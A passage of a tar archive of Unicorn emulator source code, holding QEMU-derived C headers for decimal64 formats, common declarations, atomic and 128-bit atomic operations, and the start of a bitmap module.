GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 64-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL64_H #define DECIMAL64_H #define DEC64NAME "decimal64" /* Short name */ #define DEC64FULLNAME "Decimal 64-bit Number" /* Verbose name */ #define DEC64AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal64s */ #define DECIMAL64_Bytes 8 /* length */ #define DECIMAL64_Pmax 16 /* maximum precision (digits) */ #define DECIMAL64_Emax 384 /* maximum adjusted exponent */ #define DECIMAL64_Emin -383 /* minimum adjusted exponent */ #define DECIMAL64_Bias 398 /* bias for the exponent */ #define DECIMAL64_String 24 /* maximum string length, +1 */ #define DECIMAL64_EconL 8 /* exp. continuation length */ /* highest biased exponent (Elimit-1) */ #define DECIMAL64_Ehigh (DECIMAL64_Emax+DECIMAL64_Bias-DECIMAL64_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL64_Pmax) #error decimal64.h needs pre-defined DECNUMDIGITS>=16 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL64_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 64-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL64_Bytes]; /* decimal64: 1, 5, 8, 50 bits*/ } decimal64; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal64 * decimal64FromString(decimal64 *, const char *, decContext *); char * decimal64ToString(const decimal64 *, char *); char * decimal64ToEngString(const decimal64 *, char *); /* decNumber conversions */ decimal64 * decimal64FromNumber(decimal64 *, const decNumber *, decContext *); decNumber * decimal64ToNumber(const decimal64 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal64IsCanonical(const decimal64 *); decimal64 * decimal64Canonical(decimal64 *, const decimal64 *); #endif 
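
/*
 * Worked example (editorial addition): with Emax=384, Bias=398 and
 * Pmax=16 above, the highest biased exponent comes out as
 * 384 + 398 - 16 + 1 = 767.  A C11 translation unit could check the
 * arithmetic at compile time; kept under #if 0 so the header is unchanged.
 */
#if 0
_Static_assert(DECIMAL64_Ehigh == 767, "highest biased decimal64 exponent");
#endif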
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu-common.h������������������������������������������������������������0000664�0000000�0000000�00000006060�14675241067�0020206�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * This file is supposed to be included only by .c files. No header file should * depend on qemu-common.h, as this would easily lead to circular header * dependencies. * * If a header file uses a definition from qemu-common.h, that definition * must be moved to a separate header file, and the header that uses it * must include that header. */ #ifndef QEMU_COMMON_H #define QEMU_COMMON_H #include <unicorn/platform.h> #include <qemu/typedefs.h> #define TFR(expr) do { if ((expr) != -1) break; } while (errno == EINTR) /* Copyright string for -version arguments, About dialogs, etc */ #define QEMU_COPYRIGHT "Copyright (c) 2003-2020 " \ "Fabrice Bellard and the QEMU Project developers" /* Bug reporting information for --help arguments, About dialogs, etc */ #define QEMU_HELP_BOTTOM \ "See <https://qemu.org/contribute/report-a-bug> for how to report bugs.\n" \ "More information on the QEMU project at <https://qemu.org>." /* main function, renamed */ #if defined(CONFIG_COCOA) int qemu_main(int argc, char **argv, char **envp); #endif void qemu_get_timedate(struct tm *tm, int offset); int qemu_timedate_diff(struct tm *tm); void *qemu_oom_check(void *ptr); #ifdef _WIN32 /* MinGW needs type casts for the 'buf' and 'optval' arguments. */ #define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ getsockopt(sockfd, level, optname, (void *)optval, optlen) #define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ setsockopt(sockfd, level, optname, (const void *)optval, optlen) #define qemu_recv(sockfd, buf, len, flags) recv(sockfd, (void *)buf, len, flags) #define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ sendto(sockfd, (const void *)buf, len, flags, destaddr, addrlen) #else #define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ getsockopt(sockfd, level, optname, optval, optlen) #define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ setsockopt(sockfd, level, optname, optval, optlen) #define qemu_recv(sockfd, buf, len, flags) recv(sockfd, buf, len, flags) #define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ sendto(sockfd, buf, len, flags, destaddr, addrlen) #endif struct uc_struct; void cpu_exec_init_all(struct uc_struct *uc); /** * set_preferred_target_page_bits: * @bits: number of bits needed to represent an address within the page * * Set the preferred target page size (the actual target page * size may be smaller than any given CPU's preference). 
* Returns true on success, false on failure (which can only happen * if this is called after the system has already finalized its * choice of page size and the requested page size is smaller than that). */ bool set_preferred_target_page_bits(struct uc_struct *uc, int bits); /** * finalize_target_page_bits: * Commit the final value set by set_preferred_target_page_bits. */ void finalize_target_page_bits(struct uc_struct *uc); /* OS specific functions */ void os_setup_early_signal_handling(void); void page_size_init(struct uc_struct *uc); CPUState *qemu_get_cpu(struct uc_struct *uc, int index); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016545�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/atomic.h������������������������������������������������������������0000664�0000000�0000000�00000035016�14675241067�0020177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple interface for atomic operations. * * Copyright (C) 2013 Red Hat, Inc. * * Author: Paolo Bonzini <pbonzini@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * * See docs/atomics.txt for discussion about the guarantees each * atomic primitive is meant to provide. */ #ifndef QEMU_ATOMIC_H #define QEMU_ATOMIC_H #include "qemu/compiler.h" // we do not really support multiple CPUs, so we dont care #define smp_mb() #define smp_wmb() #define smp_rmb() #define barrier() /* The variable that receives the old value of an atomically-accessed * variable must be non-qualified, because atomic builtins return values * through a pointer-type argument as in __atomic_load(&var, &old, MODEL). * * This macro has to handle types smaller than int manually, because of * implicit promotion. int and larger types, as well as pointers, can be * converted to a non-qualified type just by applying a binary operator. 
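 *
 * Editorial illustration: given "volatile bool flag;", the macro below
 * makes typeof_strip_qual(flag) name plain bool, so
 *
 *     typeof_strip_qual(flag) old;
 *
 * declares an unqualified temporary that the __atomic_* builtins can
 * store their result through.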
 */
#define typeof_strip_qual(expr)                                                    \
  __typeof__(                                                                      \
    __builtin_choose_expr(                                                         \
      __builtin_types_compatible_p(__typeof__(expr), bool) ||                      \
        __builtin_types_compatible_p(__typeof__(expr), const bool) ||              \
        __builtin_types_compatible_p(__typeof__(expr), volatile bool) ||           \
        __builtin_types_compatible_p(__typeof__(expr), const volatile bool),       \
        (bool)1,                                                                   \
    __builtin_choose_expr(                                                         \
      __builtin_types_compatible_p(__typeof__(expr), signed char) ||               \
        __builtin_types_compatible_p(__typeof__(expr), const signed char) ||       \
        __builtin_types_compatible_p(__typeof__(expr), volatile signed char) ||    \
        __builtin_types_compatible_p(__typeof__(expr), const volatile signed char), \
        (signed char)1,                                                            \
    __builtin_choose_expr(                                                         \
      __builtin_types_compatible_p(__typeof__(expr), unsigned char) ||             \
        __builtin_types_compatible_p(__typeof__(expr), const unsigned char) ||     \
        __builtin_types_compatible_p(__typeof__(expr), volatile unsigned char) ||  \
        __builtin_types_compatible_p(__typeof__(expr), const volatile unsigned char), \
        (unsigned char)1,                                                          \
    __builtin_choose_expr(                                                         \
      __builtin_types_compatible_p(__typeof__(expr), signed short) ||              \
        __builtin_types_compatible_p(__typeof__(expr), const signed short) ||      \
        __builtin_types_compatible_p(__typeof__(expr), volatile signed short) ||   \
        __builtin_types_compatible_p(__typeof__(expr), const volatile signed short), \
        (signed short)1,                                                           \
    __builtin_choose_expr(                                                         \
      __builtin_types_compatible_p(__typeof__(expr), unsigned short) ||            \
        __builtin_types_compatible_p(__typeof__(expr), const unsigned short) ||    \
        __builtin_types_compatible_p(__typeof__(expr), volatile unsigned short) || \
        __builtin_types_compatible_p(__typeof__(expr), const volatile unsigned short), \
        (unsigned short)1,                                                         \
      (expr)+0))))))

#if defined(__ATOMIC_RELAXED) && !(defined(_MSC_VER) && defined(__clang__))

/* For C11 atomic ops */

/* Sanity check that the size of an atomic operation isn't "overly large".
 * Despite the fact that e.g. i686 has 64-bit atomic operations, we do not
 * want to use them because we ought not need them, and this lets us do a
 * bit of sanity checking that other 32-bit hosts might build.
 *
 * That said, we have a problem on 64-bit ILP32 hosts in that in order to
 * sync with TCG_OVERSIZED_GUEST, this must match TCG_TARGET_REG_BITS.
 * We'd prefer not to pull in everything else TCG related, so handle
 * those few cases by hand.
 *
 * Note that x32 is fully detected with __x86_64__ + _ILP32, and that for
 * Sparc we always force the use of sparcv9 in configure. MIPS n32 (ILP32) &
 * n64 (LP64) ABIs are both detected using __mips64.
 */
#if defined(__x86_64__) || defined(__sparc__) || defined(__mips64)
# define ATOMIC_REG_SIZE  8
#else
# define ATOMIC_REG_SIZE  sizeof(void *)
#endif

/* Weak atomic operations prevent the compiler moving other
 * loads/stores past the atomic operation load/store. However there is
 * no explicit memory barrier for the processor.
 *
 * The C11 memory model says that variables that are accessed from
 * different threads should at least be done with __ATOMIC_RELAXED
 * primitives or the result is undefined. Generally this has little to
 * no effect on the generated code but not using the atomic primitives
 * will get flagged by sanitizers as a violation.
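 *
 * Editorial illustration (names hypothetical): a counter that another
 * thread polls can be bumped with the relaxed primitives defined below,
 *
 *     atomic_set(&count, atomic_read(&count) + 1);
 *
 * which satisfies the sanitizers without ordering the surrounding
 * accesses.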
*/ #define atomic_read__nocheck(ptr) \ __atomic_load_n(ptr, __ATOMIC_RELAXED) #define atomic_read(ptr) \ ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_read__nocheck(ptr); \ }) #define atomic_set__nocheck(ptr, i) \ __atomic_store_n(ptr, i, __ATOMIC_RELAXED) #define atomic_set(ptr, i) do { \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_set__nocheck(ptr, i); \ } while(0) #define atomic_rcu_read(ptr) \ ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ typeof_strip_qual(*ptr) _val; \ atomic_rcu_read__nocheck(ptr, &_val); \ _val; \ }) #define atomic_rcu_set(ptr, i) do { \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ __atomic_store_n(ptr, i, __ATOMIC_RELEASE); \ } while(0) /* All the remaining operations are fully sequentially consistent */ #define atomic_xchg__nocheck(ptr, i) ({ \ __atomic_exchange_n(ptr, (i), __ATOMIC_SEQ_CST); \ }) #define atomic_xchg(ptr, i) ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_xchg__nocheck(ptr, i); \ }) /* Returns the eventual value, failed or not */ #define atomic_cmpxchg__nocheck(ptr, old, new) ({ \ typeof_strip_qual(*ptr) _old = (old); \ (void)__atomic_compare_exchange_n(ptr, &_old, new, false, \ __ATOMIC_SEQ_CST, __ATOMIC_SEQ_CST); \ _old; \ }) #define atomic_cmpxchg(ptr, old, new) ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_cmpxchg__nocheck(ptr, old, new); \ }) /* Provide shorter names for GCC atomic builtins, return old value */ #define atomic_fetch_inc(ptr) __atomic_fetch_add(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_fetch_dec(ptr) __atomic_fetch_sub(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_fetch_add(ptr, n) __atomic_fetch_add(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_sub(ptr, n) __atomic_fetch_sub(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_and(ptr, n) __atomic_fetch_and(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_or(ptr, n) __atomic_fetch_or(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_xor(ptr, n) __atomic_fetch_xor(ptr, n, __ATOMIC_SEQ_CST) #define atomic_inc_fetch(ptr) __atomic_add_fetch(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_dec_fetch(ptr) __atomic_sub_fetch(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_add_fetch(ptr, n) __atomic_add_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_sub_fetch(ptr, n) __atomic_sub_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_and_fetch(ptr, n) __atomic_and_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_or_fetch(ptr, n) __atomic_or_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_xor_fetch(ptr, n) __atomic_xor_fetch(ptr, n, __ATOMIC_SEQ_CST) /* And even shorter names that return void. */ #define atomic_inc(ptr) ((void) __atomic_fetch_add(ptr, 1, __ATOMIC_SEQ_CST)) #define atomic_dec(ptr) ((void) __atomic_fetch_sub(ptr, 1, __ATOMIC_SEQ_CST)) #define atomic_add(ptr, n) ((void) __atomic_fetch_add(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_sub(ptr, n) ((void) __atomic_fetch_sub(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_and(ptr, n) ((void) __atomic_fetch_and(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_or(ptr, n) ((void) __atomic_fetch_or(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_xor(ptr, n) ((void) __atomic_fetch_xor(ptr, n, __ATOMIC_SEQ_CST)) #else /* __ATOMIC_RELAXED */ #if defined(__i386__) || defined(__x86_64__) || defined(__s390x__) /* * __sync_lock_test_and_set() is documented to be an acquire barrier only, * but it is a full barrier at the hardware level. Add a compiler barrier * to make it a full barrier also at the compiler level. 
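 *
 * Editorial illustration: exchange-based test-and-set is what makes a
 * minimal spinlock work,
 *
 *     while (atomic_xchg(&lock, 1)) {
 *         continue;                      (old value 1: someone holds it)
 *     }
 *     ... critical section ...
 *     atomic_set(&lock, 0);
 *
 * because the exchange both sets the flag and returns its previous value.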
 */
#ifndef _MSC_VER
#if defined(__clang__)
#define atomic_xchg(ptr, i)    __sync_swap(ptr, i)
#else
#define atomic_xchg(ptr, i)    (__sync_lock_test_and_set(ptr, i))
#endif
#endif
#endif

/* These will only be atomic if the processor does the fetch or store
 * in a single issue memory operation */
#define atomic_read(ptr)       *(ptr)
#define atomic_set(ptr, i)     *(ptr) = (i)

/**
 *
 * atomic_rcu_read - reads an RCU-protected pointer to a local variable
 * into an RCU read-side critical section. The pointer can later be safely
 * dereferenced within the critical section.
 *
 * This ensures that the pointer copy is invariant throughout the whole
 * critical section.
 *
 * Inserts memory barriers on architectures that require them (currently only
 * Alpha) and documents which pointers are protected by RCU.
 *
 * atomic_rcu_read also includes a compiler barrier to ensure that
 * value-speculative optimizations (e.g. VSS: Value Speculation
 * Scheduling) do not perform the data read before the pointer read
 * by speculating the value of the pointer.
 *
 * Should match atomic_rcu_set(), atomic_xchg(), atomic_cmpxchg().
 */
#define atomic_rcu_read(ptr)    ({          \
    atomic_read(ptr);                       \
})

/**
 * atomic_rcu_set - assigns (publicizes) a pointer to a new data structure
 * meant to be read by RCU read-side critical sections.
 *
 * Documents which pointers will be dereferenced by RCU read-side critical
 * sections and adds the required memory barriers on architectures requiring
 * them. It also makes sure the compiler does not reorder code initializing the
 * data structure before its publication.
 *
 * Should match atomic_rcu_read().
 */
#define atomic_rcu_set(ptr, i)  do {        \
    atomic_set(ptr, i);                     \
} while (0)

#define atomic_xchg__nocheck  atomic_xchg

/* Provide shorter names for GCC atomic builtins. */
#ifdef _MSC_VER
// these return the new value (so we make it return the previous value)
#define atomic_fetch_inc(ptr)  ((InterlockedIncrement(ptr))-1)
#define atomic_fetch_dec(ptr)  ((InterlockedDecrement(ptr))+1)
#define atomic_fetch_add(ptr, n) ((InterlockedAdd(ptr, n))-n)
#define atomic_fetch_sub(ptr, n) ((InterlockedAdd(ptr, -n))+n)
#define atomic_fetch_and(ptr, n) ((InterlockedAnd(ptr, n)))
#define atomic_fetch_or(ptr, n)  ((InterlockedOr(ptr, n)))
#define atomic_fetch_xor(ptr, n) ((InterlockedXor(ptr, n)))

#define atomic_inc_fetch(ptr)    (InterlockedIncrement((long*)(ptr)))
#define atomic_dec_fetch(ptr)    (InterlockedDecrement((long*)(ptr)))
#define atomic_add_fetch(ptr, n) (InterlockedExchangeAdd((long*)ptr, n) + n)
/* add the negated operand; InterlockedExchangeAdd returns the old value,
 * so subtracting n again yields the new value */
#define atomic_sub_fetch(ptr, n) (InterlockedExchangeAdd((long*)ptr, -n) - n)
#define atomic_and_fetch(ptr, n) (InterlockedAnd((long*)ptr, n) & n)
#define atomic_or_fetch(ptr, n)  (InterlockedOr((long*)ptr, n) | n)
#define atomic_xor_fetch(ptr, n) (InterlockedXor((long*)ptr, n) ^ n)

/* InterlockedCompareExchange() takes (dest, exchange, comparand), so the
 * new value goes second and the expected old value third */
#define atomic_cmpxchg(ptr, old, new) ((InterlockedCompareExchange(ptr, new, old)))
#define atomic_cmpxchg__nocheck(ptr, old, new)  atomic_cmpxchg(ptr, old, new)

#define atomic_inc(ptr)        ((void) InterlockedIncrement(ptr))
#define atomic_dec(ptr)        ((void) InterlockedDecrement(ptr))
#define atomic_add(ptr, n)     ((void) InterlockedAdd(ptr, n))
#define atomic_sub(ptr, n)     ((void) InterlockedAdd(ptr, -n))
#define atomic_and(ptr, n)     ((void) InterlockedAnd(ptr, n))
#define atomic_or(ptr, n)      ((void) InterlockedOr(ptr, n))
#define atomic_xor(ptr, n)     ((void) InterlockedXor(ptr, n))
#else
// GCC/clang
// these return the previous value
#define atomic_fetch_inc(ptr)  __sync_fetch_and_add(ptr, 1)
#define atomic_fetch_dec(ptr)  __sync_fetch_and_add(ptr, -1)
#define atomic_fetch_add(ptr, n)
__sync_fetch_and_add(ptr, n) #define atomic_fetch_sub(ptr, n) __sync_fetch_and_sub(ptr, n) #define atomic_fetch_and(ptr, n) __sync_fetch_and_and(ptr, n) #define atomic_fetch_or(ptr, n) __sync_fetch_and_or(ptr, n) #define atomic_fetch_xor(ptr, n) __sync_fetch_and_xor(ptr, n) #define atomic_inc_fetch(ptr) __sync_add_and_fetch(ptr, 1) #define atomic_dec_fetch(ptr) __sync_add_and_fetch(ptr, -1) #define atomic_add_fetch(ptr, n) __sync_add_and_fetch(ptr, n) #define atomic_sub_fetch(ptr, n) __sync_sub_and_fetch(ptr, n) #define atomic_and_fetch(ptr, n) __sync_and_and_fetch(ptr, n) #define atomic_or_fetch(ptr, n) __sync_or_and_fetch(ptr, n) #define atomic_xor_fetch(ptr, n) __sync_xor_and_fetch(ptr, n) #define atomic_cmpxchg(ptr, old, new) __sync_val_compare_and_swap(ptr, old, new) #define atomic_cmpxchg__nocheck(ptr, old, new) atomic_cmpxchg(ptr, old, new) #define atomic_inc(ptr) ((void) __sync_fetch_and_add(ptr, 1)) #define atomic_dec(ptr) ((void) __sync_fetch_and_add(ptr, -1)) #define atomic_add(ptr, n) ((void) __sync_fetch_and_add(ptr, n)) #define atomic_sub(ptr, n) ((void) __sync_fetch_and_sub(ptr, n)) #define atomic_and(ptr, n) ((void) __sync_fetch_and_and(ptr, n)) #define atomic_or(ptr, n) ((void) __sync_fetch_and_or(ptr, n)) #define atomic_xor(ptr, n) ((void) __sync_fetch_and_xor(ptr, n)) #endif #endif /* __ATOMIC_RELAXED */ #endif /* QEMU_ATOMIC_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/atomic128.h���������������������������������������������������������0000664�0000000�0000000�00000012506�14675241067�0020431�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple interface for 128-bit atomic operations. * * Copyright (C) 2018 Linaro, Ltd. * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * * See docs/devel/atomics.txt for discussion about the guarantees each * atomic primitive is meant to provide. */ #ifndef QEMU_ATOMIC128_H #define QEMU_ATOMIC128_H #include "int128.h" /* * GCC is a house divided about supporting large atomic operations. * * For hosts that only have large compare-and-swap, a legalistic reading * of the C++ standard means that one cannot implement __atomic_read on * read-only memory, and thus all atomic operations must synchronize * through libatomic. * * See https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80878 * * This interpretation is not especially helpful for QEMU. * For softmmu, all RAM is always read/write from the hypervisor. * For user-only, if the guest doesn't implement such an __atomic_read * then the host need not worry about it either. 
* * Moreover, using libatomic is not an option, because its interface is * built for std::atomic<T>, and requires that *all* accesses to such an * object go through the library. In our case we do not have an object * in the C/C++ sense, but a view of memory as seen by the guest. * The guest may issue a large atomic operation and then access those * pieces using word-sized accesses. From the hypervisor, we have no * way to connect those two actions. * * Therefore, special case each platform. */ #if defined(CONFIG_ATOMIC128) static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { return atomic_cmpxchg__nocheck(ptr, cmp, new); } # define HAVE_CMPXCHG128 1 #elif defined(CONFIG_CMPXCHG128) static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { #ifdef _MSC_VER /* compare and swap. the same as __sync_val_compare_and_swap(). if the current value of *ptr is cmp, then write new into *ptr, return *ptr old value. */ Int128 save = *ptr; if (!memcmp(ptr, &cmp, sizeof(cmp))) { *ptr = new; } return save; #else return __sync_val_compare_and_swap_16(ptr, cmp, new); #endif } # define HAVE_CMPXCHG128 1 #elif defined(__aarch64__) /* Through gcc 8, aarch64 has no support for 128-bit at all. */ static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { uint64_t cmpl = int128_getlo(cmp), cmph = int128_gethi(cmp); uint64_t newl = int128_getlo(new), newh = int128_gethi(new); uint64_t oldl, oldh; uint32_t tmp; asm("0: ldaxp %[oldl], %[oldh], %[mem]\n\t" "cmp %[oldl], %[cmpl]\n\t" "ccmp %[oldh], %[cmph], #0, eq\n\t" "b.ne 1f\n\t" "stlxp %w[tmp], %[newl], %[newh], %[mem]\n\t" "cbnz %w[tmp], 0b\n" "1:" : [mem] "+m"(*ptr), [tmp] "=&r"(tmp), [oldl] "=&r"(oldl), [oldh] "=&r"(oldh) : [cmpl] "r"(cmpl), [cmph] "r"(cmph), [newl] "r"(newl), [newh] "r"(newh) : "memory", "cc"); return int128_make128(oldl, oldh); } # define HAVE_CMPXCHG128 1 #else /* Fallback definition that must be optimized away, or error. */ Int128 QEMU_ERROR("unsupported atomic") atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new); # define HAVE_CMPXCHG128 0 #endif /* Some definition for HAVE_CMPXCHG128 */ #if defined(CONFIG_ATOMIC128) static inline Int128 atomic16_read(Int128 *ptr) { return atomic_read__nocheck(ptr); } static inline void atomic16_set(Int128 *ptr, Int128 val) { atomic_set__nocheck(ptr, val); } # define HAVE_ATOMIC128 1 #elif defined(__aarch64__) /* We can do better than cmpxchg for AArch64. */ static inline Int128 atomic16_read(Int128 *ptr) { uint64_t l, h; uint32_t tmp; /* The load must be paired with the store to guarantee not tearing. */ asm("0: ldxp %[l], %[h], %[mem]\n\t" "stxp %w[tmp], %[l], %[h], %[mem]\n\t" "cbnz %w[tmp], 0b" : [mem] "+m"(*ptr), [tmp] "=r"(tmp), [l] "=r"(l), [h] "=r"(h)); return int128_make128(l, h); } static inline void atomic16_set(Int128 *ptr, Int128 val) { uint64_t l = int128_getlo(val), h = int128_gethi(val); uint64_t t1, t2; /* Load into temporaries to acquire the exclusive access lock. */ asm("0: ldxp %[t1], %[t2], %[mem]\n\t" "stxp %w[t1], %[l], %[h], %[mem]\n\t" "cbnz %w[t1], 0b" : [mem] "+m"(*ptr), [t1] "=&r"(t1), [t2] "=&r"(t2) : [l] "r"(l), [h] "r"(h)); } # define HAVE_ATOMIC128 1 #elif HAVE_CMPXCHG128 static inline Int128 atomic16_read(Int128 *ptr) { /* Maybe replace 0 with 0, returning the old value. 
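 * (Editorial note: comparing against 0 and storing 0 either rewrites an
 * existing 0 with itself or fails; on both paths the current contents
 * come back atomically, so the cmpxchg doubles as a 16-byte load.)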
*/ #ifdef _MSC_VER Int128 x = int128_make64(0); Int128 y = int128_make64(0); return atomic16_cmpxchg(ptr, x, y); #else return atomic16_cmpxchg(ptr, 0, 0); #endif } static inline void atomic16_set(Int128 *ptr, Int128 val) { Int128 old = *ptr, cmp; do { cmp = old; old = atomic16_cmpxchg(ptr, cmp, val); #ifdef _MSC_VER } while (memcmp(&old, &cmp, sizeof(old))); #else } while (old != cmp); #endif } # define HAVE_ATOMIC128 1 #else /* Fallback definitions that must be optimized away, or error. */ Int128 QEMU_ERROR("unsupported atomic") atomic16_read(Int128 *ptr); void QEMU_ERROR("unsupported atomic") atomic16_set(Int128 *ptr, Int128 val); # define HAVE_ATOMIC128 0 #endif /* Some definition for HAVE_ATOMIC128 */ #endif /* QEMU_ATOMIC128_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/bitmap.h������������������������������������������������������������0000664�0000000�0000000�00000024052�14675241067�0020175�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Bitmap Module * * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> * * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h * * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. * See the COPYING.LIB file in the top-level directory. */ #ifndef BITMAP_H #define BITMAP_H #include "qemu/bitops.h" /* * The available bitmap operations and their rough meaning in the * case that the bitmap is a single unsigned long are thus: * * Note that nbits should be always a compile time evaluable constant. * Otherwise many inlines will generate horrible code. * * bitmap_zero(dst, nbits) *dst = 0UL * bitmap_fill(dst, nbits) *dst = ~0UL * bitmap_copy(dst, src, nbits) *dst = *src * bitmap_and(dst, src1, src2, nbits) *dst = *src1 & *src2 * bitmap_or(dst, src1, src2, nbits) *dst = *src1 | *src2 * bitmap_xor(dst, src1, src2, nbits) *dst = *src1 ^ *src2 * bitmap_andnot(dst, src1, src2, nbits) *dst = *src1 & ~(*src2) * bitmap_complement(dst, src, nbits) *dst = ~(*src) * bitmap_equal(src1, src2, nbits) Are *src1 and *src2 equal? * bitmap_intersects(src1, src2, nbits) Do *src1 and *src2 overlap? * bitmap_empty(src, nbits) Are all bits zero in *src? * bitmap_full(src, nbits) Are all bits set in *src? * qemu_bitmap_set(dst, pos, nbits) Set specified bit area * bitmap_set_atomic(dst, pos, nbits) Set specified bit area with atomic ops * qemu_bitmap_clear(dst, pos, nbits) Clear specified bit area * bitmap_test_and_clear_atomic(dst, pos, nbits) Test and clear area * bitmap_find_next_zero_area(buf, len, pos, n, mask) Find bit free area * bitmap_to_le(dst, src, nbits) Convert bitmap to little endian * bitmap_from_le(dst, src, nbits) Convert bitmap from little endian * bitmap_copy_with_src_offset(dst, src, offset, nbits) * *dst = *src (with an offset into src) * bitmap_copy_with_dst_offset(dst, src, offset, nbits) * *dst = *src (with an offset into dst) */ /* * Also the following operations apply to bitmaps. 
* * set_bit(bit, addr) *addr |= bit * clear_bit(bit, addr) *addr &= ~bit * change_bit(bit, addr) *addr ^= bit * test_bit(bit, addr) Is bit set in *addr? * test_and_set_bit(bit, addr) Set bit and return old value * test_and_clear_bit(bit, addr) Clear bit and return old value * test_and_change_bit(bit, addr) Change bit and return old value * find_first_zero_bit(addr, nbits) Position first zero bit in *addr * find_first_bit(addr, nbits) Position first set bit in *addr * find_next_zero_bit(addr, nbits, bit) Position next zero bit in *addr >= bit * find_next_bit(addr, nbits, bit) Position next set bit in *addr >= bit */ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1))) #define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1))) #define DECLARE_BITMAP(name,bits) \ unsigned long name[BITS_TO_LONGS(bits)] #define small_nbits(nbits) \ ((nbits) <= BITS_PER_LONG) int slow_bitmap_empty(const unsigned long *bitmap, long bits); int slow_bitmap_full(const unsigned long *bitmap, long bits); int slow_bitmap_equal(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_complement(unsigned long *dst, const 